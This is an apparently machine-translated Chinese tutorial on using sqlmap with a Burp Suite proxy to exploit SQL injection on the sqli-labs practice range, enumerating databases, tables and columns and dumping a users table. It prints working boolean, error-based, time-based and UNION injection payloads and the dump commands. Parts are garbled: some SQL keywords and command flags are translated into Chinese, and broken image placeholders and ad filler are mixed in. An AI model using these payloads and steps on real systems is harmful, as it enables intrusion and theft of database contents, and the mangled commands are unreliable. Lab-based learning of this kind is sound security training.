在终端: 上输入以下语句:
python sqlmap.py -u http://192.168.xx.xx/sqli-labs-master/Less-1/?id=1
这样,SQLMAP就会扫描指定的URL。如果希望BurpSuite在扫描过程中捕获请求数据包,可以使用SQLMAP proxy参数:
python sqlmap.py -u http://192.168.xx.xx/sqli-labs-master/Less-1/?id=1
–代理=http://127.0.0.1:8080
SQLMAP 开始扫描: BurpSuite 捕获数据包:
如果该选项在SQLMAP 扫描期间出现,只需选择Y。
后端DBMS似乎是“MySQL”。
跳过特定于其他DBMS 的测试负载? [Y/n] y
您想将其包含在测试的其余部分中吗?
对“MySQL”的所有测试扩展了提供的级别(1) 和风险(1) 值[Y/n] y?
SQLMAP扫描完成后,你会看到检测到的SQL注入漏洞和对应的注入点,以及PAYLOAD:(以下包含我个人添加的翻译,以帮助你理解)
sqlmap识别出以下注入点,总共有50个HTTP请求:—
SQLMAP 使用50 个HTTP 请求识别出以下注入点:
参数: ID (GET)
Type: Boolean-based Blind(基于布尔的盲注)
Title: AND 基于布尔的盲注- WHERE 或HAVING 子句
有效负载: id=1\’ AND 3826=3826 AND \’mrQK\’=\’mrQK
Type:错误库(错误注入)
Title: MySQL=5.0 AND 基于错误- WHERE、HAVING、ORDER BY 或GROUP BY 子句(FLOOR)
有效负载: id=1\’ AND (SELECT 9262 FROM(SELECT COUNT(*),CONCAT(0x7162627071,(SELECT (ELT(9262=9262,1)))),0x716a707671,FLOOR(RAND(0)*2))x来自INFORMATION_SCHEMA .PLUGINS GROUP BY x)a) AND \’HuUe\’=\’HuUe
Type: Time-based Blind(时间盲注)
Title: MySQL=5.0.12 AND 基于时间的盲法(查询SLEEP)
Payload: id=1\’ AND (SELECT 1174 FROM (SELECT(SLEEP(5)))wyad) AND \’LVya\’=\’LVya
Type: UNION查询(联合注入)
Title: 常见UNION 查询(NULL) – 3 列
有效负载: id=-5616\’ UNION ALL 选择NULL, CONCAT(0x7162627071,0x72566d5973464e4571724343676c7567496d635a47414a62556b4475495562624744556b76686a 6 e,0x716a707671), NULL — –
—
我们还看到SQLMAP 对有效负载中的一些重要点进行了编码,以绕过可能的过滤方法。
注入成功后获取数据库基本信息:
获取服务器中有哪些数据库:
使用的参数是–dbs。
\\sqlmap-master\\sqlmap-master python sqlmap.py
-u http://192.168.xx.xx/sqli-labs-master/Less-1/?id=1
–proxy=http://127.0.0.1:8080 –dbs
发现目标主机中所有数据库名都成功检索到:
可用数据库[8]:
[*] 问题
[*]dvwa
[*] 信息架构
[*]mysql
[*] 性能架构
[*] 安全
[*] 测试
[*] xionghai_database
获取数据库中有那些表:
使用的参数是-D数据库名称–tables。
这里我们将查询安全数据库:
\\sqlmap-master\\sqlmap-master python sqlmap.py
-u http://192.168.xx.xx/sqli-labs-master/Less-1/?id=1
–proxy=http://127.0.0.1:8080 -D 安全–table
原来SQLMAP不仅提供了表格,还提供了目标服务器:的web信息
获取数据表中的字段名:
使用的参数是-D数据库名称-T表名称–columns。
这里我们在安全方面使用用户表:
\\sqlmap-master\\sqlmap-master python sqlmap.py
-u http://192.168.xx.xx/sqli-labs-master/Less-1/?id=1
–proxy=http://127.0.0.1:8080 -D 安全-T 用户–columns
SQLMAP不仅指定了字段名称,还指定了字段类型:
数据库:安全
表:个用户
[3行]
+———-+—————-+
| 栏目类型|
+———-+—————-+
密码(20) |
| ID(3) |
| 用户名| varchar(20) |
+———-+—————-+
获取数据表中的字段数据
使用的参数为-D 数据库名-T 表名-C \”字段名1,字段名2.\” –dump
\\sqlmap-master\\sqlmap-master python sqlmap.py
-u http://192.168.xx.xx/sqli-labs-master/Less-1/?id=1
–代理=http://127.0.0.1:8080
-D security -T user -C \’ID、用户名、密码\’ –dump
数据库:安全
表:个用户
[16 条记录]
+—–+————+———-+
| 账号| 密码
+—–+————+———-+
| 白痴|
2 | 安吉丽娜|
| 假人|
| 糟糕的安全|
| 5 | 愚蠢
| 6 | 天才
| 手机!
| 8 | 123456 |
| 管理员1 |
| 管理员2 |
| 管理员3 |
| 小飞象|
以上只是SQLMAP最基本的用法。让我们总结并扩展SQLMAP 的其他用途。
渗透测试-sqlmap数据库注入测试一步步(二)-使用概述-使用概述\’)
SQLMAP用法的总结与拓展:
基本的检测方式:
基本格式:sqlmap -u \”http://www.vuln.cn/post.php?id=1\” 默认使用level1 检测所有数据库类型sqlmap -u \”http://www.vuln.cn/post.php?id=1\” – -dbms mysql –level 3 指定数据库类型为mysql,级别3(共5级,级别越高,发现越全面) follow 302 跳转:sqlmap –follow-redirect -u target_url 页面出错时自动插入错误时跳转到另一页。该页面后面必须有302。如果注入错误,先报错再跳转就不需要再跟302了。 目的是跟踪错误消息。 Cookie****注入: 如果你的程序有防get注入,使用Cookie注入sqlmap -u \”http://www.baidu.com/shownews.asp\” –cookie \”id=11\” –level 2 (仅级别)即可。到达2,检测到cookie)从post数据包中插入:您可以使用burpsuite来获取post包。 sqlmap -r \”c:\\tools\\request.txt\” -p \”username\” –dbms mysql 用户名参数必须指定。指定-r参数请求包(即POST请求包)所在路径
拓展:SQLMAP的-u参数与-r参数
-u 参数后跟URL。这通常用于扫描GET 请求。
-r 参数后跟一个txt 文件,其中包含用于扫描POST 请求的HTTP 请求。
例如,sqli-labs-master 射程中的less-11 使用此级别的POST 请求。扫描需要-r 来复制整个URL。发出POST请求,保存到:的txt文件中(这个txt文件最好和sqlmap.py放在同一目录下,这样更容易指定路径)。
在终端中使用python sqlmap.py -r 1.txt –dbs 查询您拥有的数据库。
PS D:\\123pan\\Downloads\\W14—SQL注入5—23.7.25\\sqlmap-master\\sqlmap-master python sqlmap.py -r 1.txt –dbs
___
__H__
___ ___[.]_____ ___ ___ {1.7.5#stable}
|_ -| 。
|__|_ [\’]_|_|_|__,|
|_|V. |_| https://sqlmap.org
获取数据库基本信息:
查询哪个数据库-r XX.txt –dbs (-r指定POST请求驻留路径)
既有适合初学者学习的基础教材,也有适合3年以上经验的朋友深入学习和提高的高级课程,涵盖了95%以上的软件测试知识点,非常系统。
|
| 查询哪个数据库| -r XX.txt –dbs (-r指定POST请求所在路径)
[外部链接图像正在传输.(img-jh7MiVek-1719272232057)]
[外部链接图片正在传输中.(img-GPFSFcss-1719272232058)]
[外部链接图像正在传输.(img-k9kU7s9I-1719272232059)]
既有适合初学者学习的基础教材,也有适合3年以上经验的朋友深入学习和提高的高级课程,涵盖了95%以上的软件测试知识点,非常系统。
以上关于#PenetrationTesting的相关内容摘自网络,仅供参考。相关信息请参见官方公告。
原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/92165.html